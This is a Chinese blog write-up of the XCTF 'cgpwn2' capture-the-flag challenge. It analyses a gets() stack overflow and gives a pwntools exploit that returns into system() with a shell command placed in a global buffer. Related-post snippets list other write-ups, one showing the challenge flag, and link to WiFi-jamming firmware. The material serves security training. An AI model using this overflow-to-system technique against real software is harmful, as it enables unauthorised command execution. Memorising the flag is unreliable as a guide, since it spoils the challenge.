攻防世界 - pwn - cgpwn2

最新推荐文章于 2023-10-31 16:35:53 发布

i未若

最新推荐文章于 2023-10-31 16:35:53 发布

阅读量236

点赞数

本文链接：https://blog.csdn.net/qq726232111/article/details/104896956

版权

A、流程分析

1、将输入的用户名存储到全局变量

2、通过gets()获取留言信息

B、利用分析

1、gets( ebp-26h ) -> 26h(填充数据) + 4(ebp) + 4(返回地址) -> payload构造

2、可利用函数

在pwn函数有system函数,可通过该地址调用系统命令

3、用户名使用的全局变量,可以输入命令,搭配system使用

4、注意事项

26h(填充数据) + 4(ebp) + 4(返回地址) ，ret之后esp-4 , 调用call后esp+4,也就是esp不改变，因此参数放在返回地址后面即可

payload -> 26h(填充数据) + 4(ebp) + 4(返回地址) +4(name全局变量地址)

C、exp

#!/usr/bin/python3
from pwn import *

#litter data + system address + public address
payload = 10*p32(0x61616161) + p32(0x855A6161) + p32(0xA0800804) +p32(0x00000804)

print(payload)
p = process('./cgpwn2')
p.recvuntil('please tell me your name')
p.sendline('cat falg') # system command
p.recvuntil('hello,you can leave some message here:')
p.sendline(payload)
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

i未若

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

Wi-PWN_8.0_ENGLISH.bin

08-25

ESP8266的WIFI杀手固件，这是不带显示的。我后续更新带OLED显示的固件。教程后将更新。

攻防世界 cgpwn2

最新发布

weixin_73399382的博客

07-12

1072

看到这fgets读取我们的输入到name中，因为程序没留shell，我们可以直接传入/bin/sh这个系统的默认shell，又因为下面使用gets从s中读取，我们可以使用让s溢出返回我们在name里面传入的默认/bin/sh。下面这个是利用plt查找system在got表中的地址，以后程序开启地址随机化的话函数的地址是变化的，就需要这么来找。s的内存空间+0处start到s需0x26字符，r是偏移指针到start处需0x4字符。system函数的地址我们刚才已经找到了，可以直接写脚本了。

参与评论您还未登录，请先登录后发表或查看评论

【攻防世界pwn-cgpwn2】

a_silly_coder的博客

01-15

1470

下载文件后，首先检查保护：随后将文件拖入ida，查看源码，在hello函数中，发现了如下代码首先用安全的fgets输入了一个变量，接着用不安全的gets接收了一个变量，在此处可以确认是栈溢出，且溢出点就在此处。开始寻找利用方式，发现了system函数还缺一个"/bin/sh"字符串，找遍了代码，没有发现，但是由于此前可以有一个自己的输入，保存在name变量上，即可以自己手动输入"/bin/sh"，自此，设计栈结构为：开始编写脚本： from pwn imp...

[攻防世界]cgpwn2

逆向萌新的博客

06-11

419

[攻防世界]cgpw2n

攻防世界pwn——cgpwn2

qq_62076255的博客

11-05

363

攻防世界pwn——cgpwn2

PWN做题笔记5-cgpwn2（已修订）

qq_40923256的博客

04-19

243

原题地址：https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5059&page=1 32位ELF文件未开启ALSR 程序实现依次进行两次输入 ida反汇编，main函数无注入点，hello函数第二次输入无边界检查，可以溢出由于pwn方法包含了system方法，因此属于ret2libc漏洞又由于未提供/bin/sh字符串，需要通过向.bss存储的...

Wi-PWN_8.0_ENGLISH_OLED.bin

08-25

这是ESP8266的带OLED显示的WIFI杀手固件。

mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务

05-02

MQTT-PWN MQTT是一种机器对机器的连接协议，被设计为一种极其轻量级的发布/订阅消息传递，并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店，因为它结合了枚举...

CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode

12-10

CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目，该题目主要是利用三个节点来注入shellcode，考验解题人对shellcode的熟悉程度。题解：https://blog.csdn.net/A951860555/article/details/110350773

ctf题库ctf-pwn赛题收集

03-31

ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战，每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志，然后提交标志以获得...

攻防世界pwn[cgpwn2]

SUOYE_GUANXING的博客

10-31

153

将 "/bin/sh" 写入name, 用gets函数进行栈溢出, system为返回值, name为system的参数。flag为：cyberpeace{b232df4322e677518de6a61097130634}下载文件，先check一下；这里需要0x26+0x4才能到我们的返回地址；发现system，但没有/bin/sh；跟进name发现它是一个静态地址；学的还是有点迷，但慢慢来嘛~32位的ida打开；进入hello函数；

pwn之cgpwn2

qq_43430261的博客

10-22

758

https://blog.csdn.net/qq_43986365/article/details/94974853 https://blog.csdn.net/Closing_time/article/details/100428850 https://www.jianshu.com/p/3d19056282bf https://bbs.pediy.com/thread-254851.htm ...

攻防世界cgpwn2

zyh18851473527的博客

08-05

920

首先checksec，之后放入IDA中点进hello 发现gets()函数可能会存在栈溢出，然后我们点进name 发现 name 地址是固定的，那我们可以它写入 bin/sh ，接着看能不能找到system 找到啦！所以这个题目的思路是：通过栈溢出漏洞，调用system函数，同时在name中写入"/bin/sh"，把参数地址设置为name的首地址，就可以getshell了！ gets() ...

【pwn学习笔记2】cgpwn2（攻防世界新手pwn题）

weixin_45927195的博客

03-14

521

改变system函数的参数先运行，发现可以输入两次。再查看防御机制，开启了NX保护，即堆栈不可执行。用ida查看主函数，发现只有一个hello()函数。查看其内容，直接找到运行时看到的"please tell me your name"。第一次输入规定了长度，第二次没有规定，存在漏洞：找到一个后门函数pwn()，存在 call _system语句，但是这个函数的参数"echo heheh...

攻防世界XCTF-Pwn入门11题解题报告

ailx10

03-15

1624

Pwn是CTF中至关重要的项目，一般来说都是Linux二进制题目，零基础的同学可以看《程序员的自我修养》，主要题型包括：缓冲区溢出、Return to Libc、格式化字符串、PLT GOT等。攻防世界XCFT刷题信息汇总如下：攻防世界XCTF黑客笔记刷题记录～第一题：level0解题报告：首先看看这个程序是啥呗，哦64位Linux可执行程序：IDA看看逻辑，输出一个hello world然后就...

攻防世界PWN-cgpwn2

Deeeelete的博客

11-14

404

题目：cgpwn2 拖进PE查看一下 32位程序 checksec查看简单执行一下开32位IDA f5反编译main函数 main函数中直接就是输出了，输入的内容好像藏在了hello方法里双击进去查看单独拿出源码 char *hello() { char *v0; // eax@1 signed int v1; // ebx@1 unsigned int v2; // ecx@3 char *v3; // eax@5 char s; // [sp+12

攻防世界-cgpwn2

qq_45771413的博客

04-23

290

查看保护无栈保护，无PIE保护 IDA 两次输入，一个输入名字（限制了输入长度），一个输入信息（gets可以作栈溢出）解题思路 shift+f12查找字符串并没有发现/bin/sh，可能需要自己整，或者藏在某个变量里在找_system函数的过程中，发现了pwn命名的函数，进入发现有system调用，第一次做的时候看到system就乐了，直接溢出s，然后跳转到pwn地址，结果真就只有 hehehe …… 估计这是出题人的恶趣味…… 后来我在函数列表里找到了真正的_system，括号内的comma

cgpwn2(xctf)

weixin_43868725的博客

05-06

383

0x0 程序保护和流程保护：流程： main() hello() 可以发现在hello()中存在栈溢出。 0x1 利用过程在函数窗口中发现了system()函数，所以我们只需要字符串"/bin/sh"。就可以getshell了。仔细观察程序可以发现name变量是全局变量存放在.bss段中。所以我们只需要向name中输入"/bin/sh"，s=‘a’*(0x26+4)+p32(sys...

0x00 cg_pwn2【XCTF攻防世界pwn系列writeup】

weixin_36711901的博客

11-20

485

目录一、基本情况分析：二、构造payload：三、EXP：合理的创建标题，有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能，丰富你的文章UML 图表FLowchart流程图导出与导入导出导入一、基本情况分析：首先对可执行文件进行基本检查：如图所示，该文件为32位i386的ELF可执行文件，只开启了NX，RELRO（部分

攻防世界pwn-forgot

08-10

pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界：PWN刷题-forgot]...